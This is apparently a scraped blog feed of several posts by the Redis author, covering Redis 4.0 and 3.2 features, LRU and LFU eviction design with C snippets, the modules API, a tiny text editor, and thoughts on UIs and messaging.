Optionally, if you enable it, now AOF rewrites are performed by prefixing the AOF file with an RDB file, which is both faster to generate and to load. This is going to be very useful in certain environments, but makes the AOF file a less transparent file, so it’s an optional thing for now. This feature was talked for ages and finally is “in”.

6. The new MEMORY command.

I love it, as much as I loved LATENCY DOCTOR that once introduced cut the percentage of “My Redis is slow” complains in the mailing list to a minor fraction. Now we have it for the memory issues as well.

127.0.0.1:6379> MEMORY DOCTOR
Hi Sam, this instance is empty or is using very little memory, my issues detector can't be used in these conditions. Please, leave for your mission on Earth and fill it with some data. The new Sam and I will be back to our programming as soon as I finished rebooting.

Movie rights owners will probably sue me for taking inspirations of sci-fi dialogues but that’s fine. Bring oranges for me when I’ll be in jail.

MEMORY does a lot more than that.

127.0.0.1:6379> MEMORY HELP
1) "MEMORY USAGE [SAMPLES ] - Estimate memory usage of key"
2) "MEMORY STATS - Show memory usage details"
3) "MEMORY PURGE - Ask the allocator to release memory"
4) "MEMORY MALLOC-STATS - Show allocator internal stats"

The memory usage reporting of the USAGE subcommand is going to be very useful, but also the in depth informations provided by “STATS”.

For now all this is totally not documented, so have fun figuring out what the heck it does.

7. Redis Cluster is now NAT / Docker compatible.

But this is actually a bad news too, because the binary protocol changed in the “Cluster bus” thing nodes use to communicate, so to upgrade to 4.0 you need a mass reboot of Redis Cluster. I’m sorry I was tricked into this NAT / Docker fixes, pardon me. And I tried to make it backward compatible but there was no way to obtain this easily, or even non easily, without doing totally awkward stuff.

The feature is explained in the example redis.conf file. You can’t see how I’m a bit less excited about this feature compared to the other ones, don’t you?

Well… that’s it I guess, those are the major things. If you want also read the release notes here: https://raw.githubusercontent.com/antirez/redis/4.0/00-RELEASENOTES

ETA to get it stable is as usually unknown: I plan to release a new RC every 2-4 weeks more or less. As bugs slow down significantly both from the point of view of severity and frequency of reporting, it will be Redis 4.0-final time. However there is a lot of doc to update as well, so I’ll have plenty of things to do.

Many thanks to all the people that contributed to this release: a lot did in significant ways. In the release note above there is the list of all the commits that you can scan in order to see the names of the committers.

Thanks to the Redis community and Redis Labs for making all this possible, but especially thanks to all the developers that use Redis and apply it well in every day problems to get shit done, because this is the whole point, other than having fun while coding.

P.s. faster way to grab the new code is to fetch the '4.0' branch from Github. Repository is as usually antirez/redis.

** Check https://news.ycombinator.com/item?id=13091370 for more info about UNLINK not being the default behavior for DEL. Comments]]>
http://antirez.com/news/110
Random notes on improving the Redis LRU algorithm http://antirez.com/news/109 http://antirez.com/news/109 Fri, 29 Jul 2016 08:04:12 +0000
In other terms every cache has an hits/misses ratio, which is, in qualitative terms, just the percentage of read queries that the cache is able to serve. Accesses to the keys of a cache are not distributed evenly among the data set in most workloads. Often a small percentage of keys get a very large percentage of all the accesses. Moreover the access pattern often changes over time, which means that as time passes certain keys that were very requested may no longer be accessed often, and conversely, keys that once were not popular may turn into the most accessed keys.

So in general what a cache should try to do is to retain the keys that have the highest probability of being accessed in the future. From the point of view of an eviction policy (the policy used to make space to allow new data to enter) this translates into the contrary: the key with the least probability of being accessed in the future should be removed from the data set. There is only one problem: Redis and other caches are not able to predict the future.

The LRU algorithm
===

While caches can’t predict the future, they can reason in the following way: keys that are likely to be requested again are keys that were recently requested often. Since usually access patterns don’t change very suddenly, this is an effective strategy. However the notion of “recently requested often” is more insidious that it may look at a first glance (we’ll return shortly on this). So this concept is simplified into an algorithm that is called LRU, which instead just tracks the *last time* a key was requested. Keys that are accessed with an higher frequency have a greater probability of being idle (not accessed) for a shorter time compared to keys that are rarely accessed.

For instance this is a representation of four different keys accesses over time. Each “~” character is one second, while the “|” line at the end is the current instant.

~~~~~A~~~~~A~~~~~A~~~~A~~~~~A~~~~~A~~|
~~B~~B~~B~~B~~B~~B~~B~~B~~B~~B~~B~~B~|
~~~~~~~~~~C~~~~~~~~~C~~~~~~~~~C~~~~~~|
~~~~~D~~~~~~~~~~D~~~~~~~~~D~~~~~~~~~D|

Key A is accessed one time every 5 seconds, key B once every 2 seconds
and key C and D are both accessed every 10 seconds.

Given the high frequency of accesses of key B, it has among the lowest idle
times, which means its last access time is the second most recent among all the
four keys.

Similarly A and C idle time of 2 and 6 seconds well reflect the access
frequency of both those keys. However as you can see this trick does not
always work: key D is accessed every 10 seconds, however it has the most
recent access time of all the keys.

Still, in the long run, this algorithm works well enough. Usually keys
with a greater access frequency have a smaller idle time. The LRU
algorithm evicts the Least Recently Used key, which means the one with
the greatest idle time. It is simple to implement because all we need to
do is to track the last time a given key was accessed, or sometimes
this is not even needed: we may just have all the objects we want to
evict linked in a linked list. When an object is accessed we move it
to the top of the list. When we want to evict objects, we evict from
the tail of the list. Tada! Win.

LRU in Redis: the genesis
===

Initially Redis had no support for LRU eviction. It was added later, when memory efficiency was a big concern. By modifying a bit the Redis Object structure I was able to make 24 bits of space. There was no room for linking the objects in a linked list (fat pointers!), moreover the implementation needed to be efficient, since the server performance should not drop too much because of the selection of the key to evict.

The 24 bits in the object are enough to store the least significant
bits of the current unix time in seconds. This representation, called
“LRU clock” inside the source code of Redis, takes 194 days to overflow. Keys metadata are updated much often, so this was good enough.

However there was another more complex problem to solve, how to select
the key with the greatest idle time in order to evict it? The Redis
key space is represented via a flat hash table. To add another data
structure to take this metadata was not an option, however since
LRU is itself an approximation of what we want to achieve, what
about approximating LRU itself?

The initial Redis algorithm was as simple as that: when there is to evict
a key, select 3 random keys, and evict the one with the highest
idle time. Basically we do random sampling over the key space and evict
the key that happens to be the better. Later this “3 random keys”
was turned into a configurable “N random keys” and the algorithm
speed was improved so that the default was raised to 5 keys sampling
without losing performances. Considering how naive it was, it worked
well, very well actually. If you think at it, you always never do
the best decision with this algorithm, but is very unlikely to do
a very bad decision too. If there is a subset of very frequently accessed
keys in the data set, out of 5 keys it is hard to be so unlucky to
only sample keys with a very short idle time.

However if you think at this algorithm *across* its executions, you
can see how we are trashing a lot of interesting data. Maybe when
sampling the N keys, we encounter a lot of good candidates, but
we then just evict the best, and start from scratch again the next
cycle.

First rule of Fight Club is: observe your algorithms with naked eyes
===

At some point I was in the middle of working at the upcoming Redis
3.0 release. Redis 2.8 was actively used as an LRU cache in multiple
environments, and people didn’t complained too much about the
precision of the eviction in Redis, but it was clear that it could
be improved even without using a noticeable amount of additional CPU
time, and not a single bit of additional space.

However in order to improve something, you have to look at it. There
are different ways to look at LRU algorithms. You can write, for example,
tools that simulate different workloads, and check the hit/miss ratio
at the end. This is what I did, however the hit/miss ratio depends
a lot on the access pattern, so additionally to this information I
wrote an utility that actually displayed the algorithm quality in a
visual way.

The program was very simple: it added a given number of keys, then
accessed the keys sequentially so that each had a decreasing
idle time. Finally 50% more keys were added (the green ones in the
picture), so that half of the old keys needed to be evicted.

In a perfect LRU implementation no key from the new added keys are evicted, and the initial 50% of the old dataset is evicted.

This is the representation produced by the program for different
versions of Redis and different settings:

http://redis.io/images/redisdoc/lru_comparison.png

When looking at the graph remember that the implementation we
discussed so far is the one of Redis 2.8. The improvement you
see in Redis 3.0 is explained in the next section.

LRU V2: don’t trash away important information
===

With the new visual tool, I was able to try new approaches and
test them in a matter of minutes. The most obvious way to improve
the vanilla algorithm used by Redis was to accumulate the otherwise
trashed information in a “pool” of good candidates for eviction.

Basically when the N keys sampling was performed, it was used to
populate a larger pool of keys (just 16 keys by default).
This pool has the keys sorted by idle time, so new keys only enter
the pool when they have an idle time greater than one key in the
pool or when there is empty space in the pool.

This small change improved the performances of the algorithm
dramatically as you can see in the image I linked above and
the implementation was not so complex. A couple memmove() here
and there and a few profiling efforts, but I don’t remember
major bugs in this area.

At the same time, a new redis-cli mode to test the LRU precision
was added (see the —lru-test option), so I had another way to
check the performances of the LRU code with a power-law access
pattern. This tool was used to validate with a different test that
the new algorithm worked better with a more real-world-ish workload.
It also uses pipelining and displays the accesses per second, so
can be used in order to benchmark different implementations, at least
to check obvious speed regressions.

Least Frequently Used
===

The reason I’m writing this blog post right now is because a couple
of days ago I worked at a partial reimplementation and to different
improvements to the Redis cache eviction code.

Everything started from an open issue: when you have multiple databases
with Redis 3.2, the algorithm evicts making local choices. So
if for example you have all keys with a small idle time in DB number 0,
and all keys with large idle time in DB number 1, Redis will evict
one key from each DB. A more rational choice is of course to start
evicting keys from DB number 1, and only later to evict the other keys.

This is usually not a big deal, when Redis is used as a cache it is
rarely used with different DBs, however this is how I started to work
at the eviction code again. Eventually I was able to modify the pool
to include the database ID, and to use a single pool for all the DBs
instead of using multiple pools. It was slower, but by profiling and
tuning the code, eventually it was faster than the original
implementation by around 20%.

However my curiosity for this subsystem of Redis was stimulated again
at that point, and I wanted to improve it. I spent a couple of days
trying to improve the LRU implementation: use a bigger pool maybe?
Account for the time that passes when selecting the best key?

After some time, and after refining my tools, I understood that the
LRU algorithm was limited by the amount of data sampled in the database
and was otherwise very good and hard to improve. This is, actually,
kinda evident from the image showing the different algorithms:
sampling 10 keys per cycle the algorithm was almost as accurate as
theoretical LRU.

Since the original algorithm was hard to improve, I started to test
new algorithms. If we rewind a bit to the start of the blog post, we
said that LRU is actually kinda a trick. What we really want is to
retain keys that have the maximum probability of being accessed in the
future, that are the keys *most frequently accessed*, not the ones with
the latest access.

The algorithm evicting the keys with the least number of accesses
is called LFU. It means Least Frequently Used, which is the feature of
the keys that it attempts to kill to make space for new keys.

In theory LFU is as simple as associating a counter to each key. At
every access the counter gets incremented, so that we know that a given
key is accessed more frequently than another key.

Well, there are at least a few more problems, not specific to Redis,
general issues of LFU implementations:

1. With LFU you cannot use the “move to head” linked list trick used for LRU in order to take elements sorted for eviction in a simple way, since keys must be ordered by number of accesses in “perfect LFU”. Moving the accessed key to the right place can be problematic because there could be many keys with the same score, so the operation can be O(N) in the worst case, even if the key frequency counter changed just a little. Also as we’ll see in point “2” the accesses counter does not always change just a little, there are also sudden large changes.

2. LFU can’t really be as trivial as, just increment the access counter
on each access. As we said, access patterns change over time, so a key
with an high score needs to see its score reduced over time if nobody
keeps accessing it. Our algorithm must be albe to adapt over time.

In Redis the first problems is not a problem: we can just use the trick
used for LRU: random sampling with the pool of candidates. The second
problem remains. So normally LFU implementations have some way in order
to decrement, or halve the access counter from time to time.

Implementing LFU in 24 bits of space
===

LFU has its implementation peculiarities itself, however in Redis all
we can use is our 24 bit LRU field in order to model LFU. To implement
LFU in just 24 bits per objects is a bit more tricky.

What we need to do in 24 bits is:

1. Some kind of access frequency counter.
2. Enough information to decide when to halve the counter.

My solution was to split the 24 bits into two fields:

16 bits 8 bits
+----------------+--------+
+ Last decr time | LOG_C |
+----------------+--------+

The 16 bit field is the last decrement time, so that Redis knows the
last time the counter was decremented, while the 8 bit field is the
actual access counter.

You are thinking that it’s pretty fast to overflow an 8 bit counter,
right? Well, the trick is, instead of using just a counter, I used
a logarithmic counter. This is the function that increments the
counter during accesses to the keys:

uint8_t LFULogIncr(uint8_t counter) {
if (counter == 255) return 255;
double r = (double)rand()/RAND_MAX;
double baseval = counter - LFU_INIT_VAL;
if (baseval < 0) baseval = 0;
double p = 1.0/(baseval*server.lfu_log_factor+1);
if (r < p) counter++;
return counter;
}

Basically the greater is the value of the counter, the less probable
is that the counter will really be incremented: the code above computes
a number ‘p’ between 0 and 1 which is smaller and smaller as the counter
increases. Then it extracts a random number ‘r’ between 0 and 1 and only
increments the counter if ‘r < p’ is true.

You can configure how much aggressively the counter is implemented
via redis.conf parameters, but for instance, with the default
settings, this is what happens:

After 100 hits the value of the counter is 10
After 1000 is 18
After 100k is 142
After 1 million hits it reaches the 255 limit and no longer increments

Now let’s see how this counter is decremented. The 16 bits are used in
order to store the less significant bits of the UNIX time converted
to minutes. As Redis performs random sampling scanning the key space
in search of keys to populate the pool, all keys that are encountered
are checked for decrement. If the last decrement was performed more than
N minutes ago (with N configurable), the value of the counter is halved
if it is an high value, or just decremented if it is a lower value
(in the hope that we can better discriminate among keys with few
accesses, given that our counter resolution is very small).

There is yet another problem, new keys need a chance to survive after
all. In vanilla LFU a just added key has an access score of 0, so it
is a very good candidate for eviction. In Redis new keys start with
an LFU value of 5. This initial value is accounted in the increment
and halving algorithms. Simulations show that with this change keys have
some time in order to accumulate accesses: keys with a score less than
5 will be preferred (non active keys for a long time).

Code and performances
===

The implementation described above can be found in the “unstable” branch
of Redis. My initial tests show that it outperforms LRU in power-law
access patterns, while using the same amount of memory per key, however
real world access patterns may be different: time and space locality
of accesses may change in very different ways, so I’ll be very happy
to learn from real world use cases how LFU is performing, and how the
two parameters that you can tune in the Redis LFU implementation change
the performances for different workloads.

Also an OBJECT FREQ subcommand was added in order to report the
frequency counter for a given key, this can be both useful in order
to observe an application access pattern, and in order to debug the
LFU implementation.

Note that switching at runtime between LRU and LFU policies will have
the effect to start with almost random eviction, since the metadata
accumulated in the 24 bits counter does not match the meaning of the
newly selected policy. However over time it adapts again.

There are probably many improvements possible.

Ben Manes pointed me to this interesting paper, describing an algorithm
called TinyLRU (http://arxiv.org/pdf/1512.00727.pdf).

The paper contains a very neat idea: instead of remembering the
access frequency of the current objects, let’s (probabilistically)
remember the access frequency of all the objects seen so far, this
way we can even refuse new keys if, from the name, we believe they
are likely to get little accesses, so that no eviction is needed at all,
if evicting a key means to lower the hits/misses ratio.

My feeling is that this technique, while very interesting for plain
GET/SET LFU caches, is not applicable to the data structure server
nature of Redis: users expect the key to exist after being created
at least for a few milliseconds. Refusing the key creation at all
seems semantically wrong for Redis.

However Redis maintains LFU informations when a key is overwritten, so
for example after a:

SET oldkey some_new_value

The 24 bit LFU counter is copied to the new object associated to the
old key.

The new eviction code of Redis unstable contains other good news:

1. Policies are now “cross DB”. In the past Redis made local choices as explained at the start of this blog post. Now this is fixed for all the policies, not just LRU.

2. The volatile-ttl eviction policy, which is the one that evicts based on the remaining time to live of keys with an expire set, now uses the pool like the other policies.

3. Performances are better by reusing SDS objects in the pool of keys.

This post ended a lot longer than I expected it to be, but I hope it offered a few insights on the new stuff and the improvements to the old things we already had. Redis, more than a “solution” to solve a specific problem, is a generic tool. It’s up to the sensible developer to apply it in the right way. Many people use Redis as a caching solution, so improvements in this area are always investigated from time to time.

Hacker News comments: https://news.ycombinator.com/item?id=12185534 Comments]]>
http://antirez.com/news/109
Writing an editor in less than 1000 lines of code, just for fun http://antirez.com/news/108 http://antirez.com/news/108 Sun, 10 Jul 2016 10:51:11 +0000
Screencast here: https://asciinema.org/a/90r2i9bq8po03nazhqtsifksb

For the sentimentalists, keep reading…

A couple weeks ago there was this news about the Nano editor no longer being part of the GNU project. My first reaction was, wow people still really care about an old editor which is a clone of an editor originally part of a terminal based EMAIL CLIENT. Let’s say this again, “email client”. The notion of email client itself is gone at this point, everything changed. And yet I read, on Hacker News, a number of people writing how they were often saved by the availability of nano on random systems, doing system administrator tasks, for example. Nano is also how my son wrote his first program in C. It’s an acceptable experience that does not require past experience editing files.

This is how I started to think about writing a text editor ways smaller than Nano itself. Just for fun, basically, because I like and admire small programs.

How lame, useless, wasting of time is today writing an editor? We are supposed to write shiny incredible projects, very cool, very complex, valuable stuff. But sometimes to make things without a clear purpose is refreshing. There were also memories…

I remember my first experiences with the Commodore 16 in-ROM assembler, and all the home computers and BASIC interpreters I used later in my child life. An editor is a fundamental connection between the human and the machine. It allows the human to write something that the computer can interpret. The blinking of a square prompt is something that many of us will never forget.

Well, all nice, but my time was very limited. A few hours across two weekends with programmed family activities and meat to prepare for friends in long barbecue sessions. Maybe I could still write an editor on a few spare hours with some trick. My goal was to write an editor which was very small, no curses, and with syntax highlighting. Something usable, basically. That’s the deal.. It’s little stuff, but is already hard to write all this from scratch in a few hours.

But … wait, I actually wrote an editor in the past, is part of the LOAD81 project, a Lua based programming environment for children. Maybe I can just reuse it… and instead of using SDL to write on the screen what about sending VT100 escape sequences directly to the terminal? And I’ve code for this as well in linenoise, another toy project that eventually found its place in some may other serious projects. So maybe mixing the two…

The first week Saturday morning I went to the sea, and it was great. Later my brother arrived from Edinburg to Catania, and at the end of the day we were together in the garden with our laptops, trying to defend ourselves from the 30 degrees that there were during the day, so I started to hack the first skeleton of the editor. The LOAD81 code was quite modular, to take it away from the original project was a joke. I could kinda edit after a few hours, and it was already time to go bed. The next day I worked again at it before leaving for the sea again. My 15yo sleeps till 1pm, as I did when I was 15yo in summertime after all, so I coded more in sprints of 30 minutes waiting for him to get up, using the rest of the time to play with my wonderful daughter. Finally later in the Sunday night I tried to fix all the remaining stuff.

Hey I remember that a few years ago to hack on a project was, to *hack* on it, full time for days. I’m old now, but still young enough to write toy editors and consider it a serious business :-)

However life is hard, and Monday arrived. Real business, no time for toy projects, not even time to release what I got during the weekend… It deserved some minimal polishing and a blog post.

I had to wait this Monday to put my hands on the “Kilo” editor again. It’s called Kilo because it has less than 1024 lines of code. The “cloc” utility, used in order to count the number of lines of code, signaled me I still had ~100 lines of space before reaching 1024 LOC, and a serious editor needs a “search” feature after all. So back to the code, trying also to restructure and recomment it a bit, since you know, when you mix two projects pieces in a few hours the risk is that the code quality is less than excellent.

Well, now it’s time to release it, end of this crazy project. Maybe somebody will use it as a starting point to write a real editor, or maybe it could be used to write some new interesting CLI that goes over the usual REPL style model.

The code is at http://github.com/antirez/kilo

HN comments: https://news.ycombinator.com/item?id=12065217 Comments]]>
http://antirez.com/news/108
Programmers are not different, they need simple UIs. http://antirez.com/news/107 http://antirez.com/news/107 Tue, 24 May 2016 15:06:17 +0000 I really mean it when I say *days*, just for the API. Writing drafts, starting the implementation shaping data structures and calls, and then restarting from scratch to iterate again in a better way, to improve the design and the user facing part.

Why I do that, delaying features for weeks? Is it really so important?
Programmers are engineers, maybe they should just adapt to whatever API is better to export for the system exporting it.

Should I really reply to my rhetorical questions? No, it is no longer needed today, and that’s a big win.

I want to assume that at this point is tacit, given for granted, that programmers also have user interfaces, and that such user interfaces are so crucial to completely change the perception of a system. Database query languages, libraries calls, programming languages, Unix command line tools, they all have an User Interface part. If you use them daily, for you they are more UIs than anything else.

So if this is all well known why I’m here writing this blog post? Because I want to stress how important is the concept of simplicity, not just in graphical UIs, but also in UIs designed for programmers. The act of iterating again and again to find a simple UI solution is not a form of perfectionism, it’s not futile narcissism. It is more an exploration in the design space, that sometimes is huge, made of small variations that make a big difference, and made of big variations that completely change the point of view. There are no rules to follow but your sensibility. Yes there are good practices, but they are not a good compass when the sea to navigate is the one of the design *space*.

So why programmers should have this privilege of having good, simple UIs? Sure there is the joy of using something well made, that is great to handle, that feels *right*. But there is a more central question. Learning to configure Sendmail via M4 macros, or struggling with an Apache virtual host setup is not real knowledge. If such a system one day is no longer in use, what remains in your hands, or better, in your neurons? Nothing. This is ad-hoc knowledge. It is like junk food: empty calories without micronutrients.

For programmers, the micronutrients are the ideas that last for decades, not the ad-hoc junk. I don’t want to ship junk, so I’ll continue to refine my designs before shipping. You should not accept junk, your neurons are better spent to learn general concepts. However in part it is inevitable: every system will have something that is not general that we need to learn in order to use it. Well, if that’s the deal, at least, let’s make the ad-hoc part a simple one, and if possible, something that is even fun to use. Comments]]>
http://antirez.com/news/107
Redis Loadable Modules System http://antirez.com/news/106 http://antirez.com/news/106 Tue, 10 May 2016 17:02:55 +0000
Modules can be the most interesting feature of a system and the most problematic one at the same
time: API incompatibilities between versions, low quality modules crashing the system, a lack
of identity of a system that is extendible are possible problems. SO, for years, I managed to avoided adding modules to Redis, and Lua scripting was a good tool in order to delay their addition. At the same time, years of experience with scripting, demonstrated that scripting is a way to “compose” existing features, but not a way to extend the capabilities of a system towards use cases it was not designed to cover.

Previous attempts at modules also showed that one of the main pain points about mixing Redis
and loadable modules is the way modules are bound with the Redis core. In may ways Redis resembles more a programming language than a database. To extend Redis properly, the module needs to have access to the internal API of the system. Directly exporting the Redis core functions to modules creates huge problems: the module starts to depend on the internal details of Redis. If the Redis core evolves, the module needs to be rewritten. This creates either a fragile modules ecosystem or stops the evolution of the Redis core. Redis internals can’t stop to evolve, nor the modules developers can keep modifying the module in order to stay updated with the internals (something that happened in certain popular systems in the past, with poor results).

With all this lessons in mind, I was leaving Catania to fly to Tel Aviv, to have a meeting at
Redis Labs to talk about the roadmap for the future months. One of the topics of our chat was loadable modules. During the flight I asked myself if it was possible to truly decouple the Redis core from the modules API, but still have a low level access to directly manipulate Redis data structure. So I started to immediately code something. What I wanted was an extreme level of API compatibility for the future, so that a module wrote today could work in 4 years from now with the same API, regardless of the changes to the Redis core. I also wanted binary compatibility so that the 4 years old module could even *load* in the new Redis versions and work as expected, without even the need to be recompiled.

At the end of the flight I arrived in Tel Aviv with something already working in the “modules” branch. We discussed together how the API would work, and at the end everybody agreed that to be able to manipulate Redis internals directly was a fundamental feature. What we wanted to accomplish was to allow Redis developers to create commands that were as capable as the Redis native commands, and also as fast as the native commands. This cannot be accomplished just with an high level API that calls Redis commands, it’s too slow and limited. There is no point in having a Redis modules system that can just do what Lua can already do. You need to be able to say, get me the value associated with this key, what type is it? Do this low level operation on the value. Given me a cursor into the sorted set at this position, go to the next element, and so forth. To create an API that works as an intermediate layer for such low level access is tricky, but definitely possible.

I returned home and started to work at the modules system immediately. After a couple of weeks I had a prototype that was already functional enough to develop interesting modules, featuring low level functions like data types low level access, strings DMA to poke with the internals of strings without wrappers when needed, a replication API, an interesting sorted set iterator API, and so forth. It looked was a very promising start, however the project was kinda of “secret” because it was not clear if it was viable initially. Also we wanted to avoid everybody to start developing modules while the API was extremely unstable and subject to changes.

The result of this process, while not complete, is very promising, so today I’m announcing the new feature at Redis Conference 2016, and the code was just pushed into the “unstable” branch. But let’s check the API a bit…

Here is a trivial example of what a module can do and how it works. It implements a
“list splice” operation that moves elements from a list to another:

int HelloListSpliceAuto_RedisCommand(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc != 4) return RedisModule_WrongArity(ctx);

RedisModule_AutoMemory(ctx);

RedisModuleKey *srckey = RedisModule_OpenKey(ctx,argv[1],
REDISMODULE_READ|REDISMODULE_WRITE);
RedisModuleKey *dstkey = RedisModule_OpenKey(ctx,argv[2],
REDISMODULE_READ|REDISMODULE_WRITE);

/* Src and dst key must be empty or lists. */
if ((RedisModule_KeyType(srckey) != REDISMODULE_KEYTYPE_LIST &&
RedisModule_KeyType(srckey) != REDISMODULE_KEYTYPE_EMPTY) ||
(RedisModule_KeyType(dstkey) != REDISMODULE_KEYTYPE_LIST &&
RedisModule_KeyType(dstkey) != REDISMODULE_KEYTYPE_EMPTY))
{
return RedisModule_ReplyWithError(ctx,REDISMODULE_ERRORMSG_WRONGTYPE);
}

long long count;
if ((RedisModule_StringToLongLong(argv[3],&count) != REDISMODULE_OK) ||
(count < 0))
{
return RedisModule_ReplyWithError(ctx,"ERR invalid count");
}

while(count-- > 0) {
RedisModuleString *ele;

ele = RedisModule_ListPop(srckey,REDISMODULE_LIST_TAIL);
if (ele == NULL) break;
RedisModule_ListPush(dstkey,REDISMODULE_LIST_HEAD,ele);
}

size_t len = RedisModule_ValueLength(srckey);
RedisModule_ReplyWithLongLong(ctx,len);
return REDISMODULE_OK;
}

int RedisModule_OnLoad(RedisModuleCtx *ctx) {
if (RedisModule_Init(ctx,"helloworld",1,REDISMODULE_APIVER_1)
== REDISMODULE_ERR) return REDISMODULE_ERR;

if (RedisModule_CreateCommand(ctx,"hello.list.splice.auto",
HelloListSpliceAuto_RedisCommand,
"write deny-oom",1,2,1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
}

There was a big effort into providing a clean API, and an API that is not prone to misuses.
For example there is support for automatic memory management, so that the context the command
operates on, collects the objects that are not explicitly freed by the user, in order to free them when the command returns if needed. This makes writing modules a lot simpler.

You can find the API documentation here (not perfect but there is enough to get familiar):
https://github.com/antirez/redis/blob/unstable/src/modules/INTRO.md

And the API reference here:
https://github.com/antirez/redis/blob/unstable/src/modules/API.md

And many simple examples of commands here:
https://github.com/antirez/redis/blob/unstable/src/modules/helloworld.c

The API is yet not complete nor stable, and will be released with the next stable version of Redis (likely 4.0). However it is already enough to do a lot of things, and my colleagues did very interesting things, from inverted indexes to authentication systems. In the next weeks we’ll fill all the holes, for example there is no low level Set API, so you’ll have to use Call() style API for now. Similarly the iterator is only provided for the sorted set type, and so forth.

But the important point is that the process is now started, and Redis is becoming an extendible system.
I think this will give more power to Redis users, power to go “faster” than the project itself, in using Redis to model their problems, with the big promise that, after Redis 4.0 RC is out, we’ll not break the API ever for years to come, so that modules work will not get wasted.
Note that we *can improve* the API, since the module registration asks for a given API version,
so it will be possible to maintain the backward compatibility while at the same time release new versions of the API.

Soon there will be a Modules Directory were you can register your modules, using redis-cli, into a server that talks the Redis protocol. It was not possible to finish it in time unfortunately, but it is just a matter of weeks.

I’m very very excited about what will happen now! Modules will have a Bazar model like clients, so there will not be “official modules”. The good ones will be used for sure, and all will get listed in the Redis site, probably ranked by Github stars or something like that.

I hope many users will start to be part of the modules ecosystem and make Redis able to solve very specific use cases that was not wise to solve inside the core, but that are a good fit for modules.

Now I need your feedbacks while the API is still malleable. Tell me what you think! Comments]]>
http://antirez.com/news/106
Three ideas about text messages http://antirez.com/news/105 http://antirez.com/news/105 Sat, 07 May 2016 18:42:15 +0000
I don’t mind staying disconnected for some time usually. It’s a good time to focus, write some code, or a blog post like this one. However when I’m disconnected, what makes the most difference is not Facebook or Twitter or Github, but the lack of text messages.

At this point text messages are a fundamental thing in my life. They are also probably the main source of distraction. I use messages to talk with my family, even just to communicate between different floors. I use messages with friends to organize dinners and vacations. I even use messages with the plumber or the doctor.

Clearly messages are not going to go away. They need to get better, so I usually tend to thing at topics related to messaging applications. The following are three recurrent thoughts I’ve about this topic.

1. WhatsApp is not used in the US.

Do you know what’s the social network that is reshaping the most the way we communicate in Europe? Is the WhatsApp application. Since it is the total standard and an incredible amount of the population has it, “WhatsApp Groups” is changing the way people communicate. There is a group for each school class, one for the children and one for the parents. One for families, another for groups of friends. One for the kindergarten of my daughter, where teachers post from time to time pictures of our children doing activities.

WhatsApp is also one of the main pains of modern life. All this groups continuously beep. However what they are doing for the society is incredible: they are truly making every human being interconnected. This magic is possible because here in Italy, and in most other EU countries, WhatsApp is *the standard* so everybody assumes you use it.

To me it is pretty incredible that this is not happening in the US, the place where most social applications are funded and created. Given that in the US there are both Android and iOS phones I wonder what’s stopping this from happening. My guess is that it’s just a matter of time and a unified messaging platform will happen there too.

* Why voice recognition is not used more.

For people that can write text fast into a real keyboard, the software keyboard of the phone is one of the most annoying things ever. Similarly, teenagers excluded, many other people have issues writing long text messages with a phone keyboard.

At the same time, the voice recognition software of Android, powered by the Google servers, reached a point where it rarely does errors at all, so why just a few people use it on a daily basis? My theory is that the user interface to activate and use the voice recognition feature is so bad to be the main barrier to make this feature a big hit.

First you have to find how to activate it, and usually is not a prominent button on the keyboard. Then there is this delay and it emits a beep and starts to listen, and it’s not clear exactly how to stop it, especially if the environment is aloud. The whole thing looks like if you are suffering from the servers latency, but voice is voice. With delays and non clear experience you kill the big advantage of talking to your phone. This should be just a “push the button while you talk” thing. When you push the button, the system starts to record your voice immediately and connects asynchronously to the servers. As text arrives back, it is shown to the user. When the user releases the button the voice thing is done. As simple as that. At the end, the words that were inserted in this way could be shown in some special way (like a different gray) in the text area, so that one can tap individual words and select alternatives if there are errors.

Please Google freaking do that. I wonder if it’s any better on iOS, I don’t use it for some time at this point.

* Auto transcription of text messages.

Since the phone keyboard is such a mess, people are using more and more voice messages, especially with WhatsApp. It is very convenient for people writing messages, since there is the “push and talk” experience that there is not in the speech to text feature. However it is not always very convenient for the people receiving the message, that may be in an environment where to listen to the conversation is not easy.

However there is something that could work in that regard, that is, the WhatsApp (or whatever) servers, should automatically translate the message to text, so that the user can both play the message or just look at the text, if it’s clear enough. When there are doubts on given words, the text can be highlighted in some way to show the user that it’s better to listen to the voice message since there are non clear words, however this could easily make 95% of messages promptly available to the user just reading.

This way the feature would be friction-less both ways, for the users writing (dictating actually) and for the user receiving the messages.


TLDR: Messaging is everywhere, make it better. Comments]]>
http://antirez.com/news/105
Redis 3.2.0 is out! http://antirez.com/news/104 http://antirez.com/news/104 Fri, 06 May 2016 11:07:50 +0000
* The GEO API. Index whatever you want by latitude and longitude, and query by radius, with the same speed and easy of use of the other Redis data structures. Here you can find the API documentation: http://redis.io/commands/#geo. Thank you to Matt Stancliff for the initial implementation, that was reworked but is still at the core of the GEO API, and to the developers of ARDB for providing the geo indexing code that Matt used.

* The new BITFIELD command allows to use a Redis string as a bit array composed of many integers with user specified size and offset. It supports increments and decrements to exploit this small (or large) integers as counters, with fine control over the overflow behavior. http://redis.io/commands/bitfield. Thanks to Yoav Steinberg for pushing forward this crazy idea and motivating me to write an implementation.

* Many improvements to Redis Cluster, including rebalancing capabilities in redis-trib and better replicas migration. However support for NATted envrionments and Docker port forwarding, while implemented in the “unstable” branch, was not backported to 3.2 for maturity concerns.

* Improvements to Lua scripts replication. It is now possible to use “effects replication” to write scripts containing side effects. It’s documented here: http://redis.io/commands/EVAL. Thanks to Yossi Gottlieb for stimulating the addition of this feature and helping in the design.

* We have now a serious Lua scripts debugger: https://www.youtube.com/watch?v=IMvRfStaoyM with support into redis-cli. Thanks to Itamar Haber, developer of non trivial scripts since the start of Lua scripting, that really wanted this feature and helped during the development.

* Redis is now more memory efficient thanks to changes operated by Oran Agra to SDS and the Jemalloc size classes setup. Also we have a new List internal representation contributed by Matt Stancliff which uses just a small percentage of the memory used before to represent large lists!

* Finally slaves and masters are in agreement about what keys are expired during read operations. It was about time :-)

* SPOP now accepts an optional count argument. Thanks to Alon Diamant for providing the initial implementation. I kinda rewrote it for performances later, and we ended with a pretty fast thing.

* RDB AUX fields. So now your RDB files have a few informations inside, like the server that generated it, in what date, and so forth. Soon we’ll have redis-cli able to parse those fields (in 3.2.1) hopefully. It’s a small amount of work but I’m remembering only know writing this notes, honestly.

* RDB loading is faster now.

